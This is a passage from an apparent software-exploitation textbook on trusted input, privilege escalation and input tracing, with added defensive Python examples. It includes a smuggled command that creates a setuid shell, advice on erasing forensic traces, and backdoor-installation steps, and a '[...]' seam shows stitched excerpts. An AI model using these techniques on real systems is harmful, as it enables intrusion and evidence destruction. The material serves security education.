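    b"Host: www.example.test\r\n"
    b"\r\n"
)


def parse_query(raw_request: bytes) -> dict:
    """Pull the query parameters out of the request line, as the server would."""
    request_line = raw_request.split(b"\r\n", 1)[0].decode("ascii")
    target = request_line.split(" ")[1]
    return dict(parse_qsl(urlsplit(target).query))


def blacklist_clean(name: str) -> str:
    """Blacklist approach: strip the 'bad' sequence. One pass over "....//" leaves "../"."""
    return name.replace("../", "")


def resolve_blacklist(name: str) -> str:
    """Vulnerable: trusts the filtered name and lets normpath walk out of DOCROOT."""
    return posixpath.normpath(posixpath.join(DOCROOT, blacklist_clean(name)))


SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def resolve_whitelist(name: str) -> str:
    """Hardened: accept only names matching the whitelist, then confirm the
    resolved path is still a direct child of DOCROOT."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected filename: {name!r}")
    path = posixpath.normpath(posixpath.join(DOCROOT, name))
    if posixpath.dirname(path) != DOCROOT:
        raise ValueError(f"path escapes document root: {path}")
    return path


def is_allowed(name: str) -> bool:
    """Convenience wrapper: does the whitelist resolver accept this name?"""
    try:
        resolve_whitelist(name)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    params = parse_query(RAW_REQUEST)
    print("blacklist resolves to:", resolve_blacklist(params["file"]))
    print("whitelist accepts it:", is_allowed(params["file"]))
```

The blacklist version resolves the crafted name to /etc/passwd because a single replace of "../" turns "....//" back into "../"; the whitelist version never reaches the file system, and even a whitelisted name is checked against the document root after normalization.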

Attack Pattern: Make the Client Invisible

Remove the client from the communications loop by talking directly with the server. Explore to determine what the server will and will not accept as input. Masquerade as the client.

Any trust that is placed in a client by the server is a recipe for disaster. A secure server program should be explicitly paranoid about any data submitted over the network and must always assume that a hostile client is being used. For this reason, secure programming practice can never include solutions based on hidden fields or JavaScript form validation. For the same reason, secure design must never trust input from a client. For more on how to avoid the trusted input problem, see Writing Secure Code [Howard and LeBlanc, 2002] and Building Secure Software [Viega and McGraw, 2001].


The Privilege Escalation Problem

Certain components of a system have trust relationships (sometimes implicit, sometimes explicit) with other parts of the system. Some of these trust relationships offer "trust elevation" possibilities, that is, these components can escalate trust by crossing internal boundaries from a region of less trust to a region of more trust. To understand this, think about what happens when a kernel-level system call is made by a simple application. The kernel is clearly trusted to a much greater extent than the application, because if the kernel misbehaves, really bad things happen, whereas the application can usually be killed with far from drastic consequences.

When we talk about trusted parameters we should think in terms of trust elevation in the system. Where is a trusted parameter being input and where is it being used? Does the point of use belong to a region of higher trust than the point of input? If so, we have uncovered a privilege escalation path.

Process-Permissions Equal Trust

The permissions of a process place an effective upper limit on the capabilities of an exploit, but an exploit is not bound by a single process. Remember that you are attacking a system. Account for situations when a low-privilege process communicates with a higher privilege process. Synchronous communication may be carried out via procedure calls, file handles, or sockets. Interestingly, communication via a data file is free from most normal time constraints. So are many database entries. This means you can place "logic bombs" or "data bombs" in a system that go off some time in the future when a certain state is reached.

Links between programs can be extensive and very hard to audit. For the developer, this means that natural cracks will exist in the design. Thus, opportunity exists for the attacker. System boundaries often present the greatest areas of weakness in a target. Vulnerabilities also exist where multiple components communicate. The connections can be surprising. Consider a log file. If a low-privilege process can create log entries and a high-privilege process reads the log file, there exists a clear communication path between the two programs. Although this may seem far fetched, there have been published exploits leveraging vulnerabilities of this nature. For example, a Web server will log user-supplied data from page requests. An anonymous user can insert special meta-characters into the page request, thus causing the characters to be saved in a log file. When a root-level user performs normal system maintenance on the log file, the meta-characters can cause data to be appended to the password file. Problems ensue.
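The log file path described above, as an added example rather than code from the book: a low-privilege server writes request lines to a log, and a privileged maintenance job later parses the log and acts on it. The log format, the maintenance job and the two request lines are constructed for illustration; the point is that a newline inside the attacker's request becomes a whole record of the attacker's choosing unless the writer escapes it.

```python
"""Added example (not from the book): the log file as a communication path between a
low-privilege writer and a high-privilege reader. The log format, the maintenance job
and the request lines are made up for illustration."""
import re

# Constructed request lines. The second one embeds a quote, a newline and a forged record.
HONEST_REQUEST = "GET /index.html HTTP/1.0"
HOSTILE_REQUEST = 'GET /index.html HTTP/1.0"\n10.0.0.1 "GET /admin/reset HTTP/1.0'

# Everything the reader's parser treats as structure: control characters (record
# separator), the quote that delimits the field, and the escape character itself.
CONTROL_OR_QUOTE = re.compile(r'[\x00-\x1f\x7f"\\]')


def format_entry_unsafe(remote_addr: str, request_line: str) -> str:
    """Writer in the low-privilege server: copies the request line into the log as-is."""
    return f'{remote_addr} "{request_line}"\n'


def format_entry_safe(remote_addr: str, request_line: str) -> str:
    """Writer that hex-escapes anything the reader would interpret as structure."""
    escaped = CONTROL_OR_QUOTE.sub(lambda m: f"\\x{ord(m.group()):02x}", request_line)
    return f'{remote_addr} "{escaped}"\n'


def parse_entries(log_text: str) -> list:
    """Reader in the privileged maintenance job: one record per line, address first."""
    entries = []
    for line in log_text.splitlines():
        addr, _, rest = line.partition(" ")
        entries.append((addr, rest.strip('"')))
    return entries


def addresses_to_ban(log_text: str) -> set:
    """Maintenance job: any address that requested /admin/reset gets blocked."""
    return {addr for addr, req in parse_entries(log_text) if "/admin/reset" in req}


def run_demo(formatter) -> dict:
    """Log two requests from the same (attacker) address, then run the maintenance job."""
    attacker = "198.51.100.7"
    log_text = formatter(attacker, HONEST_REQUEST) + formatter(attacker, HOSTILE_REQUEST)
    return {"entries": len(parse_entries(log_text)), "banned": addresses_to_ban(log_text)}


if __name__ == "__main__":
    print("unsafe writer:", run_demo(format_entry_unsafe))
    print("safe writer:  ", run_demo(format_entry_safe))
```

With the unsafe writer the two requests produce three records, and the forged third record makes the privileged job ban an address the attacker chose (10.0.0.1). With the escaping writer the same input stays one record, and the only address that ends up on the ban list is the attacker's own.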

If We Don't Run as Administrator, Everything Breaks!

Secure programming guides are full of references to the principle of least privilege (see Building Secure Software [Viega and McGraw, 2001], for example). The problem is that most code is not designed to work with least privilege. Oftentimes the code will fail to operate properly if access restrictions are placed on it. The sad thing is that many such programs could very likely be written without requiring Administrator or root access, but they aren't. As a result, today's software runs with way too much systemwide privilege. Thinking about privilege requires adjusting your viewpoint to a panoramic, systemwide view. (This is an excellent attacker trick that you should internalize.) Often the OS is the essential service providing privilege and access control checks, but many programs do not properly adhere to the least-privilege concept, so they abuse the OS and request too much privilege (often without being told "no"). Furthermore, the user of the program may or may not notice this issue, but you can be assured that an attacker will. One very interesting technique is to run a target program in a sandbox and examine the security context of each call and operation (something that is made easier in advanced platforms like Java 2). Privilege problems are very likely to surface during this exercise, and thus provide one of the richest forms of attack.

Attack Pattern: Target Programs That Write to Privileged OS Resources

Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These are typically run with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break.

Elevated Processes That Read Data from Untrusted Sources

Once remote access to a system has been obtained, an attacker should begin looking for files and registry keys that can be controlled. Likewise, the attacker should begin looking for local pipes and system objects. Windows NT, for example, has an object manager and a directory of system objects that include memory sections (actual memory segments that can have read/write access), open file handles, pipes, and mutexes. All these are potential input points where an attacker can take the next step into the machine. Once the border of the software system has been penetrated, the attacker will usually want to obtain further access into the kernel or server process. Any data input point can be used as a toehold to climb further into privileged memory spaces.

Attack Pattern: Use a User-Supplied Configuration File to Run Commands That Elevate Privilege

A setuid utility program accepts command-line arguments. One of these arguments allows a user to supply the path to a configuration file. The configuration file allows shell commands to be inserted. Thus, when the utility starts up, it runs the given commands. One example found in the wild is the UUCP (or UNIX-to-UNIX copy program) set of utilities. The utility program may not have root access, but may belong to a group or user context that is more privileged than that of the attacker. In the case of UUCP, the elevation may lead to the dialer group, or the UUCP user account. Escalating privilege in steps will usually lead an attacker to a root compromise (the ultimate goal). Some programs will not allow a user-supplied configuration file, but the systemwide configuration file may have weak permissions. The number of vulnerabilities that exist because of poorly configured permissions is large.

A note of caution: As an attacker, you must consider the configuration file as an obvious detection point. A security process may monitor the target file. If you make changes to a configuration file to gain privilege, then you should immediately clean the file when you are finished. You can also run certain utilities to set back file access dates. The key is not to leave a forensic trail surrounding the file you exploited.
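An added example (not from the book) of the checks a setuid-style utility should make before trusting a configuration file, covering both halves of the pattern above: a file the user can point the program at, and a systemwide file that has been left world-writable. The ownership and mode checks, the key=value grammar and the sample UUCP-style settings are assumptions made for illustration; the example runs on a POSIX system and creates its sample files in a temporary directory.

```python
"""Added example (not from the book): a setuid-style utility deciding whether a
configuration file may be trusted before it reads it. The permission and ownership
checks, the key=value grammar and the sample files are assumptions for illustration."""
import os
import re
import stat
import tempfile

# Only bare key=value lines with a conservative value alphabet are accepted.
KEY_VALUE = re.compile(r"([A-Za-z_][A-Za-z0-9_]*)=([A-Za-z0-9_./:@-]*)")
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def is_trusted_file(path: str, trusted_uids) -> bool:
    """Refuse anything that is not a regular file (so no symlinks), is not owned by a
    trusted uid, or is writable by group or others."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid not in trusted_uids:
        return False
    if st.st_mode & WRITABLE_BY_OTHERS:
        return False
    return True


def load_config(path: str, trusted_uids) -> dict:
    """Parse key=value lines. Anything outside the grammar (backticks, semicolons,
    pipes, spaces) is rejected instead of ever reaching a shell."""
    if not is_trusted_file(path, trusted_uids):
        raise PermissionError(f"untrusted configuration file: {path}")
    config = {}
    with open(path, encoding="ascii") as fh:
        for lineno, raw in enumerate(fh, 1):
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            match = KEY_VALUE.fullmatch(line)
            if match is None:
                raise ValueError(f"{path}:{lineno}: rejected line {line!r}")
            config[match.group(1)] = match.group(2)
    return config


def run_demo() -> dict:
    """Three constructed cases: a sane file, a file smuggling a shell command in a
    value, and the sane file after its permissions are loosened to world-writable."""
    me = (os.getuid(),)  # the utility trusts only files owned by its own uid
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "good.conf")
        with open(good, "w") as fh:
            fh.write("# spool directory\nspool=/var/spool/uucp\nport=/dev/cua0\n")
        os.chmod(good, 0o644)
        results["good"] = load_config(good, me)

        hostile = os.path.join(tmp, "hostile.conf")
        with open(hostile, "w") as fh:
            fh.write("spool=/var/spool/uucp\nport=`cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh`\n")
        os.chmod(hostile, 0o644)
        try:
            load_config(hostile, me)
            results["hostile"] = "accepted"
        except ValueError:
            results["hostile"] = "rejected"

        os.chmod(good, 0o666)  # the weak-permissions case
        try:
            load_config(good, me)
            results["world_writable"] = "accepted"
        except PermissionError:
            results["world_writable"] = "rejected"
    return results


if __name__ == "__main__":
    print(run_demo())
```

The ownership and mode checks address the systemwide-file case: a configuration file that anyone can write is no more trustworthy than one the attacker supplied on the command line. The grammar check addresses the user-supplied case: a value that could only be "useful" if handed to a shell is refused before the program starts.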

Processes That Use Elevated Components

Some processes are smart enough to execute user requests as a low-privilege thread. These requests, in theory, cannot be used in attacks. However, one underlying assumption is that the low-privilege accounts used to control access cannot read secret files, and so forth. The fact is that many systems are not administered very well, and even low-privilege accounts can walk right through the file system and process space. Also note that many approaches to least privilege have exceptions. Take the Microsoft IIS server, for example. If IIS is not configured properly, injected user code can execute the RevertToSelf() API call and cause the code to become administrator level again. Furthermore, certain DLLs are always executed as administrator, regardless of the user's privilege. The moral of the story here is that if you audit a target long enough, you are very likely to find a point of entry where least privilege is not being applied.


Finding Injection Points

There are several tools that can be used to audit the system for files and other injection points. In the case of Windows NT, the most popular tools for watching the registry or file system are available from http://www.sysinternals.com. The tools called filemon and regmon are good for tracking files and registry keys. These are fairly well-known tools. Other tools that provide these kinds of data make up a class of programs called API monitors. Figure 4-1 shows one popular tool called filemon. Monitor programs hook certain API calls and allow you to see what arguments are being passed. Sometimes these utilities allow the calls to be changed on the fly, a primitive form of fault injection.

Figure 4-1. This is a screen shot of filemon, a file system snooping tool available at www.sysinternals.com. This program is useful when reverse engineering software to find vulnerabilities.


Cigital's Failure Simulation Tool (FST) does just this (Figure 4-2). FST interposes itself between an application and the DLLs by rewriting the import address table. In this way, the API monitor can see exactly which APIs are being called and which parameters are being passed. FST can be used to report interesting sorts of failures to the application under test.[1] Tools like filemon and FST demonstrate the use of interposition as a critical injection point.

[1] For more on FST, see the publication by Schmid and Ghosh [1999].

Figure 4-2. Cigital's FST in action. FST uses interposition to simulate failed system calls.



Watching Input Files

Look for files that are used for input. During startup, a program may read from several configuration points including the often-overlooked environment variables. Also look for directory access or file access where a file is not found. A program may look for a configuration file in several locations. If you see a location where the file cannot be found, this presents an opportunity for attack.

Attack Pattern: Make Use of Configuration File Search Paths

If you place a copy of the configuration file into a previously empty location, the target program may find your version first and forgo any further searching. Most programs are not aware of security, so no check will be made against the owner of the file. The UNIX PATH environment variable will sometimes specify that a program should look in multiple directories for a given file. Check these directories to determine whether you can sneak a Trojan file into the target.
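An added example (not from the book, and not Cigital's FST) that applies the interposition idea from Finding Injection Points and the search-path observation from this section to a Python program: the monitor hooks builtins.open to record every path the target tries, including the misses that mark where a planted configuration file would be picked up first, and can inject a failure for a chosen path the way FST does. The target program, its search path and the configuration content are made up, and the files live in a temporary directory.

```python
"""Added example (not from the book): a small filemon/FST-style monitor for a Python
program. It interposes on builtins.open to record every file the target tries to read
(including the misses, which are the search-path injection points) and can inject a
failure for a chosen path. The target program and its search path are made up."""
import builtins
import errno
import os
import tempfile


class OpenMonitor:
    """Hook open(); log (path, outcome); fail any path listed in fail_paths."""

    def __init__(self, fail_paths=()):
        self.fail_paths = set(fail_paths)
        self.events = []

    def __enter__(self):
        self._real_open = builtins.open
        builtins.open = self._hooked_open
        return self

    def __exit__(self, *exc_info):
        builtins.open = self._real_open
        return False

    def _hooked_open(self, file, mode="r", *args, **kwargs):
        path = file if isinstance(file, int) else os.fspath(file)
        if path in self.fail_paths:
            # Fault injection: the call never reaches the OS.
            self.events.append((path, "INJECTED EACCES"))
            raise PermissionError(errno.EACCES, os.strerror(errno.EACCES), path)
        try:
            handle = self._real_open(file, mode, *args, **kwargs)
        except FileNotFoundError:
            self.events.append((path, "NOT FOUND"))
            raise
        self.events.append((path, "OPENED"))
        return handle


def load_setting(search_dirs, name="app.conf") -> str:
    """Target program: walk the search path and return the first config it finds.
    Only a missing file is tolerated; any other failure goes unhandled."""
    for directory in search_dirs:
        candidate = os.path.join(directory, name)
        try:
            with open(candidate) as fh:
                return fh.read().strip()
        except FileNotFoundError:
            continue
    return "defaults"


def run_demo() -> dict:
    """Search path of three directories; the real config sits only in the last one."""
    with tempfile.TemporaryDirectory() as tmp:
        search_dirs = [os.path.join(tmp, d) for d in ("etc", "home", "install")]
        for d in search_dirs:
            os.mkdir(d)
        real_conf = os.path.join(search_dirs[-1], "app.conf")
        with open(real_conf, "w") as fh:  # written outside the monitor
            fh.write("debug=1\n")

        with OpenMonitor() as mon:  # pass 1: watch what the target looks for
            value = load_setting(search_dirs)
        misses = [p for p, outcome in mon.events if outcome == "NOT FOUND"]

        with OpenMonitor(fail_paths={real_conf}) as faulted:  # pass 2: inject a failure
            try:
                load_setting(search_dirs)
                fault_outcome = "handled"
            except PermissionError:
                fault_outcome = "unhandled PermissionError"

    return {
        "value": value,
        "misses": len(misses),
        "first_miss_dir": os.path.basename(os.path.dirname(misses[0])),
        "fault_outcome": fault_outcome,
        "injected": faulted.events[-1][1],
    }


if __name__ == "__main__":
    print(run_demo())
```

The first pass is the filemon view: two NOT FOUND events ahead of the real file, each a directory where a planted app.conf would win the search. The second pass is the FST view: one injected EACCES on the file the program actually uses, and the target, which only expected "not found", falls over instead of falling back to its defaults.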

Input Path Tracing

Input tracing is a very complete but tedious technique for tracking what is happening with user input. The technique involves setting breakpoints at the locations where user data are accepted in a program, and then tracing forward. To save some time you can use call tracing tools, control flow tools, and memory breakpoint techniques. These techniques are described in more detail in Chapter 3. For the following exercise we use path tracing to trace input into a vulnerable file system call.

Using GDB and IDA-Pro Together on a Solaris SPARC Binary

Although IDA-Pro is a Windows-based tool, the professional version can be used to disassemble binaries for a variety of hardware platforms. In this example, we use IDA-Pro to disassemble one of the main executables of the Netscape I-Planet Application Server running on Solaris 8/Ultra-SPARC 10.

GDB is quite possibly the most powerful debugger available. Advanced features such as conditional breakpoints and expressions put GDB in the same class with SoftICE. GDB, of course, will also disassemble code, so technically IDA is not required. However, IDA is the best choice for tackling a large disassembly project.

Setting Breakpoints and Expressions

Breakpoints are crucial whenever reversing a target. A breakpoint allows you to stop the program at a chosen place. Once stopped, we can examine memory and then single step through function calls. With a disassembly open in one window, it's possible to single step in another window and take notes. What makes IDA so handy is the ability to take notes while performing a running disassembly. Using a disassembler (and the resulting dead listing) and a running debugger at the same time is a variety of gray box testing.

There are two basic ways to get started with breakpoints: inside-out or outside-in. Going inside-out involves finding an interesting system call or API function, such as a file operation, then setting a breakpoint on that function and working backward to determine whether any user-supplied data are being passed to the call. This is a powerful way to reverse a program, but should be automated as much as possible. Going outside-in involves finding the precise function where user data are first introduced into the program, then single stepping and mapping the execution of the code forward into the program. This is very useful for determining where branching logic in the code is based on user-supplied data. Both methods can be combined for maximum effect.

Mapping Runtime Memory Addresses from IDA

Unfortunately, memory addresses displayed in IDA do not map directly to the runtime addresses seen while using GDB. However, it is easy to determine the offsets and do the mapping by hand. For example, if IDA displays the function INTutil_uri_is_evil_internal at address 0x00056140, the following command can be issued to find the true runtime address. IDA displays

.text:00056140 ! ||||||||||||||| S U B R O U T I N E |||||||||||||||||||||||||||
.text:00056140
.text:00056140
.text:00056140                 .global INTutil_uri_is_evil_internal

Setting a breakpoint with GDB will reveal the true runtime address of this subroutine:

(gdb) break *INTutil_uri_is_evil_internal
Breakpoint 1 at 0xff1d6140

So, from this we can see that 0x00056140 maps to 0xff1d6140. Note that the offset within the mapping, 0x6140, is the same in both addresses. A rough mapping simply involves substituting the upper 2 bytes of the address (here 0x0005 becomes 0xff1d). The same substitution converts any other IDA address in this module to its runtime address, and any runtime address back to IDA's, but only within the one shared object: each library is loaded at its own base, so every library you care about needs its own pair of addresses.
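The address translation above, worked as an added Python example (not code from the book): given one static/runtime pair it derives the load slide, checks that the low 16 bits agree as the text expects, turns further IDA addresses into gdb breakpoint commands, and maps frames from an "info stack" listing back into IDA for one library. The helper names and the sample stack text are this example's own; the addresses are the ones shown on the page.

```python
import re

def slide_from_pair(static_addr, runtime_addr):
    """Slide between IDA's static image and the live mapping, from one known pair.
    The check mirrors the text: the low 16 bits must agree, or the pair is wrong."""
    if (static_addr & 0xFFFF) != (runtime_addr & 0xFFFF):
        raise ValueError("low 16 bits differ; not the same module, or the pair is wrong")
    return runtime_addr - static_addr

def to_runtime(static_addr, slide):
    """IDA address -> address gdb reports (valid for the same shared object only)."""
    return static_addr + slide

def to_static(runtime_addr, slide):
    """gdb address -> IDA address (same shared object only)."""
    return runtime_addr - slide

def gdb_break_command(static_addr, slide):
    """Breakpoint command for a function located in IDA."""
    return "break *0x%08x" % to_runtime(static_addr, slide)

GDB_BREAK_RE = re.compile(r"Breakpoint \d+ at 0x([0-9a-fA-F]+)")
IDA_ADDR_RE = re.compile(r"^\.text:([0-9a-fA-F]{8})")
FRAME_RE = re.compile(r"^#\d+\s+0x([0-9a-fA-F]+) in (\S+) \(\) from (\S+)")

def parse_gdb_breakpoint(line):
    """'Breakpoint 1 at 0xff1d6140' -> 0xff1d6140"""
    m = GDB_BREAK_RE.search(line)
    if not m:
        raise ValueError("not a gdb breakpoint line: %r" % line)
    return int(m.group(1), 16)

def parse_ida_address(line):
    """'.text:00056140 ...' -> 0x56140"""
    m = IDA_ADDR_RE.match(line.strip())
    if not m:
        raise ValueError("not an IDA .text line: %r" % line)
    return int(m.group(1), 16)

def static_frames(stack_text, slide, library):
    """From 'info stack' output, return (function, IDA address) for frames in `library`.
    Frames from other shared objects have their own slide and are skipped."""
    frames = []
    for line in stack_text.splitlines():
        m = FRAME_RE.match(line.strip())
        if m and m.group(3).endswith("/" + library):
            frames.append((m.group(2), to_static(int(m.group(1), 16), slide)))
    return frames

# Constructed from the gdb session on the page (frames #2..#5 omitted).
STACK = """\
#0  0xfedd9490 in _MD_getfileinfo64 () from /usr/local/iplanet/servers/bin/https/lib/libnspr4.so
#1  0xfedd5830 in PR_GetFileInfo64 () from /usr/local/iplanet/servers/bin/https/lib/libnspr4.so
#6  0xff1e6cdc in INTrequest_info_path () from /usr/local/iplanet/servers/bin/https/lib/libns-httpd40.so
"""

if __name__ == "__main__":
    slide = slide_from_pair(
        parse_ida_address(".text:00056140 .global INTutil_uri_is_evil_internal"),
        parse_gdb_breakpoint("Breakpoint 1 at 0xff1d6140"))
    print("slide for libns-httpd40.so: 0x%08x" % slide)
    print(gdb_break_command(0x00057000, slide))
    for func, addr in static_frames(STACK, slide, "libns-httpd40.so"):
        print("%s is at .text:%08x in IDA" % (func, addr))
```

The libnspr4 frames are deliberately not translated: their addresses (0xfedd....) sit in a different mapping and would need a pair taken from that library.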

Attaching to a Running Process

A nice feature of GDB is the ability to attach to and detach from a currently running process. Because most server software has a complex startup cycle, it is often very difficult or inconvenient to start the server within a debugger. The ability to attach to an already running process is a great time-saver. First, find the PID of the process to debug. In the case of Netscape I-Planet, locating the correct process takes a few tries and some trial and error. To attach to a running process with GDB, start gdb and then type the following command at the prompt, where process-id is the PID of your target:

(gdb) attach process-id

Once you have attached to the process, type the continue command so the executable will continue running. You can use ctrl-c to get back to the gdb prompt.

(gdb) continue


If the process is multithreaded, you can see a list of all the threads by issuing the info command. (The info command has many uses beyond simply listing threads, of course.)

(gdb) info threads
  90 Thread 71           0xfeb1a018 in _lwp_sema_wait () from /usr/lib/libc.so.1
  89 Thread 70 (LWP 14)  0xfeb18224 in _poll () from /usr/lib/libc.so.1
  88 Thread 69           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  87 Thread 68           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  86 Thread 67           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  85 Thread 66           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  84 Thread 65           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  83 Thread 64           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  82 Thread 63           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  81 Thread 62           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  80 Thread 61           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  79 Thread 60           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  78 Thread 59           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  77 Thread 58           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  76 Thread 57           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  75 Thread 56           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  74 Thread 55           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  73 Thread 54           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  72 Thread 53           0xfeb88014 in cond_wait () from /usr/lib/libthread.so.1
  ...

To get a list of all the functions on the call stack, issue the following:

(gdb) info stack
#0  0xfedd9490 in _MD_getfileinfo64 () from /usr/local/iplanet/servers/bin/https/lib/libnspr4.so
#1  0xfedd5830 in PR_GetFileInfo64 () from /usr/local/iplanet/servers/bin/https/lib/libnspr4.so
#2  0xfeb62f24 in NSFC_PR_GetFileInfo () from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so
#3  0xfeb64588 in NSFC_ActivateEntry () from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so
#4  0xfeb63fa0 in NSFC_AccessFilename () from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so
#5  0xfeb62d24 in NSFC_GetFileInfo () from /usr/local/iplanet/servers/bin/https/lib/libnsfc.so
#6  0xff1e6cdc in INTrequest_info_path () from /usr/local/iplanet/servers/bin/https/lib/libns-httpd40.so
...

In this example, _MD_getfileinfo64 is the current function, which was called by PR_GetFileInfo64, which was called by NSFC_PR_GetFileInfo, and so forth. The call stack can help you backtrack a function call and determine which code path is being followed.

Using Truss to Model the Target on Solaris

To reverse engineer the I-Planet binaries, we copied the main executable and all the linked libraries to a standard Windows 2000 workstation where IDA-Pro was installed. The goal was to examine the file system calls and the URL filtering code to uncover possible ways into the file system remotely. This example can be used as a model for finding vulnerabilities in many software packages. Reverse engineering targets on many UNIX platforms is possible using IDA, and GDB is available for almost every platform out there.

When reversing a Web server, the first task is to locate any routines that handle uniform resource identifier (URI) data. The URI data are supplied by remote users. If there is any weakness, this is the easiest to exploit. Among the huge number of API calls that are made every second, it's hard to track down what is important. Fortunately there are some powerful tools that can help you model a running application. For this example, the URI handling routines were tracked down using the excellent Solaris tool called Truss.[2]

[2] More information about Truss can be found at http://solaris.java.sun.com/articles/multiproc/truss_comp.h

Under Solaris 8, Truss will track the library API calls of a running process. This is useful to determine which calls are being made when certain behavior is occurring. To figure out where data were being handled in the I-Planet server, we ran Truss against the main process and dumped logs of the calls that were made while Web requests were handled. (If you are not running under Solaris, you can use a similar tool such as ltrace. ltrace is a free, open-source tool and it works on many platforms.)

Truss is very easy to use and has the nice feature that it can be attached to and detached from a running process. To attach Truss to a process, get the PID of the target and issue the following command:

# truss -u *:: -vall -xall -p process_id

(Quote the library pattern, -u '*::', if your shell would otherwise expand the asterisk against file names in the current directory.) If you are interested only in certain API calls, you can use Truss with grep:

# truss -u *:: -vall -xall -p 2307 2>&1 | grep anon

This example will "truss" the process with PID 2307 and will only show calls with the substring anon in them. You can change the grep slightly to ignore only certain calls. This is useful because you may want to see everything except those annoying poll and read calls:

# truss -u *:: -vall -xall -p 2307 2>&1 | grep -v read | grep -v poll

(Note that the 2>&1 redirection is required because Truss does not deliver its data on the stdout pipe; the trace goes to stderr.) The output of the command will look something like this:

/67:    libns-httpd40:__0FT_util_strftime_convPciTCc(0xff2ed342, 0x2, 0x2,
/67:    libns-httpd40:INTpool_strdup(0x9e03a0, 0xff2ed330, 0x0, 0x0)
/67:      -> libc:strlen(0xff2ed330, 0x0, 0x0, 0x0)
/67:

[...]

... $tmpfile");
print SCRFILE "$scr";
close(SCRFILE);
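A parser for the truss -u trace format shown above, as an added Python example (not code from the book). It turns trace lines into records, drops the noisy poll and read entries the grep pipeline filters out, counts calls per library, and follows one buffer address across calls, which is what input path tracing does by hand. The sample log is constructed after the lines on the page; the extra calls, the return value and the function names of the helpers are this example's own.

```python
import re
from collections import Counter

# One truss -u line:  /<lwp>[@thread]:  [-> | <-] library:function(args)[ = retval]
LINE_RE = re.compile(
    r"^/(?P<lwp>\d+)(?:@\d+)?:\s*(?P<dir>->|<-)?\s*"
    r"(?P<lib>[\w.+-]+):(?P<func>[\w$.]+)\((?P<args>[^)]*)\)"
    r"(?:\s*=\s*(?P<ret>\S+))?"
)

def parse_truss(text):
    """Return one dict per parseable line; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["lwp"] = int(rec["lwp"])
        rec["dir"] = rec["dir"] or "->"      # bare lines are call entries
        rec["args"] = [a.strip() for a in rec["args"].split(",") if a.strip()]
        records.append(rec)
    return records

def entries(records):
    """Call entries only; '<-' lines carry the return value and are dropped."""
    return [r for r in records if r["dir"] == "->"]

def interesting_calls(records, noisy=("poll", "read")):
    """Same idea as 'grep -v read | grep -v poll', applied to entries."""
    return [r for r in entries(records) if r["func"] not in noisy]

def calls_by_library(records):
    """How many calls each library received; a first model of the process."""
    return dict(Counter(r["lib"] for r in entries(records)))

def calls_with_arg(records, value):
    """Follow one pointer (for example a request buffer) through the trace."""
    return [r for r in entries(records) if value in r["args"]]

# Constructed sample, modelled on the truss output on the page.
TRUSS_LOG = """\
/67:    libns-httpd40:INTpool_strdup(0x9e03a0, 0xff2ed330, 0x0, 0x0)
/67:      -> libc:strlen(0xff2ed330, 0x0, 0x0, 0x0)
/67:      <- libc:strlen() = 0x10
/67:    libc:poll(0xff2ed100, 0x1, 0x3e8, 0x0)
/67:    libc:read(0x9, 0xff2ed000, 0x1000, 0x0)
/67:    libnspr4:PR_GetFileInfo64(0xff2ed330, 0xff2ed200, 0x0, 0x0)
/68:    libc:poll(0xff2ee100, 0x1, 0x3e8, 0x0)
"""

if __name__ == "__main__":
    recs = parse_truss(TRUSS_LOG)
    print("calls per library:", calls_by_library(recs))
    for r in interesting_calls(recs):
        print("lwp %d  %s:%s(%s)" % (r["lwp"], r["lib"], r["func"], ", ".join(r["args"])))
    print("buffer 0xff2ed330 reaches:",
          [r["lib"] + ":" + r["func"] for r in calls_with_arg(recs, "0xff2ed330")])
```

The last query is the payoff: the same buffer address passed to INTpool_strdup and strlen turns up as the first argument of a file-information call, which is exactly the kind of user data to file system path the breakpoint hunt above is looking for.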

Complete compromise of a system usually includes installing a backdoor such as Sub7 or Back Orifice. The first step is to run a test command to check access permissions. Launching a full-out assault without knowing whether the commands actually allow files to be created is unwise. The status of the log files must also be considered. Can they be written to? Can they be erased? Attackers who do not think this through carefully are bound for trouble. To test for writability, issue a command like this:



touch temp.dat

Then issue a directory listing:

ls

The file should be there. Now try to delete it:

rm temp.dat

Can it be erased? Now check the log files. If the system is a Windows NT server, the log files are likely to be found in the WINNT\system32\LogFiles directory. Try to append some data to one of these files (the filename will vary):

echo AAA >> ex2020.log
type ex2020.log



Check that the new data are there. Now try to delete the file. If the file can be wiped, we're in luck: the attacker can safely exploit the system and clean up afterward. If (and only if) these tests pass and files can be placed on the system, then step 2, creating a script file for the backdoor, is possible.

* Attack Example: Injection and FTP

